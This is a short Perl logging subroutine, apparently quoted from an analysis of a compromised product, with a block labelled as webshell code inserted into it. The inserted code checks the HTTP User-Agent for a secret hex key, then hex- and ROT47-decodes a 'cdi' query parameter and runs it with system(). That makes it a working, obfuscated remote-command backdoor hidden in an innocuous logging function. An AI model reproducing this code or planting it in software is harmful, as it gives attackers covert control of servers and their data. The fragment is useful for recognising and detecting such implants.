sub Msg {
my ($event, $level, $data) = @_;
my ($pkg, $file, $line) = caller;
-- start of webshell code --
my $ua = $ENV{HTTP_USER_AGENT};
my $req = $ENV{QUERY_STRING};
my $qur = "3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6";
my @param = split(/&/, $req);
if (index($ua, $qur) != -1) {
if ($param[1]){
my @res = split(/=/, $param[1]);
if ($res[0] eq "cdi"){
$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
$res[1] =~ tr/!-~/P-~!-O/;
system(${res[1]});
}
}
}
-- end of webshell code --
$file = substr ($file, rindex ($file, "/")+1);
# Prevent C printf format codes to make it through...
$data =~ s/%/%%/g;
Msg_impl ($file, $line, $event, $level, $data);
}